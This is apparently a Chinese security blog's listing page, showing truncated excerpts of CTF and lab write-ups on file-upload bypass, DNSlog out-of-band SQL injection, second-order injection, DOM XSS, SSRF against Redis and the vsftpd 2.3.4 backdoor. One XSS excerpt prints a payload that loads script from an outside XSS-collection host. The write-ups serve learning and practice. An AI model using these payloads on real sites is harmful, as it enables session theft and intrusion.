摘要: 这里拿upload-labs的第18关做演示 首先先看代码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES[ 阅读全文
posted @ 2023-08-28 21:45 CVE-柠檬i 阅读(61) 评论(0) 推荐(0) 编辑
摘要: 前言什么是UNC什么是DNSlog注入DNSlog注入的条件防止DNSlog注入的几个措施 sqli-labs试验 前言 前几天面试的时候,面试官问我知不知道OOB(带外数据)。 当时我蒙了,确实没听说过这个东西,然后面试官告诉我原来dnslog注入就是带外通信的一种。 什么是UNC UNC(Uni 阅读全文
posted @ 2023-08-07 01:13 CVE-柠檬i 阅读(107) 评论(0) 推荐(0) 编辑
摘要: SQL注入写文件的三个必要条件 Web目录有读写权限: 当目标网站的Web目录具有读写权限时,攻击者可以通过注入恶意SQL语句将恶意文件写入服务器上的Web目录。 知道文件的绝对路径: 攻击者需要知道目标系统上的文件的绝对路径,以便将恶意内容写入到指定目录的文件中。 secure_file_priv 阅读全文
posted @ 2023-08-06 01:19 CVE-柠檬i 阅读(32) 评论(0) 推荐(0) 编辑
摘要: 想直接查看payload的点这里 前言 二次注入(Second-Order Injection)是指攻击者在应用程序中注入恶意数据,然后在稍后的操作或不同的上下文中再次使用该恶意数据,导致安全漏洞。它通常发生在数据库查询、数据导出、报告生成等过程中。 典型的二次注入示例包括在用户注册时注入恶意代码, 阅读全文
posted @ 2023-07-08 02:04 CVE-柠檬i 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 前文:DOM反射XSS 进入网站,直接查看源代码,下面是关键代码,这里有xss漏洞: <script> var target = location.search.split("=") if (target[0].slice(1) == "jumpto") { location.href = targ 阅读全文
posted @ 2023-07-05 03:05 CVE-柠檬i 阅读(120) 评论(0) 推荐(0) 编辑
摘要: 前文链接:DOM反射xss 这次直接浏览器输入payload,发现 script 被过滤掉了 </textarea>'"><script src=http://xsscom.com//cZ2vvZ></script> 碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。 双写绕过 </textare 阅读全文
posted @ 2023-07-05 00:42 CVE-柠檬i 阅读(17) 评论(0) 推荐(0) 编辑
摘要: 前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台 1. 构造闭合语句 根据题目提示,判断网站存在DOM xss漏洞 查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围 <script> $("#tex 阅读全文
posted @ 2023-07-04 23:44 CVE-柠檬i 阅读(91) 评论(0) 推荐(0) 编辑
摘要: 安装环境 演示服务器版本为CentOS 8 安装apache 下载apache yum install httpd httpd-devel 启动apache服务器 systemctl start httpd 设置apache开机自启 systemctl enable httpd 查看apache运行 阅读全文
posted @ 2023-07-04 20:27 CVE-柠檬i 阅读(9) 评论(0) 推荐(0) 编辑
摘要: CTFHub SSRF Redis协议 进入环境,可以看到url格式为: http://challenge-2c082607df3fa433.sandbox.ctfhub.com:10800/?url= 1. 生成 根据题目,选择用工具 Gopherus 进行生成 payload 查看工具提示,使用 阅读全文
posted @ 2022-12-31 17:01 CVE-柠檬i 阅读(82) 评论(0) 推荐(0) 编辑
摘要: vsftpd2.3.4笑脸漏洞复现 目标服务器:metasploitable2(192.168.171.11) 渗透机:Kali(192.168.171.21) 方法一:手动复现 首先用kali扫描一下目标机端口 nmap -sV 192.168.171.11 然后用ftp连接该ip: 用户名随便输 阅读全文
posted @ 2022-10-29 23:03 CVE-柠檬i 阅读(58) 评论(0) 推荐(0) 编辑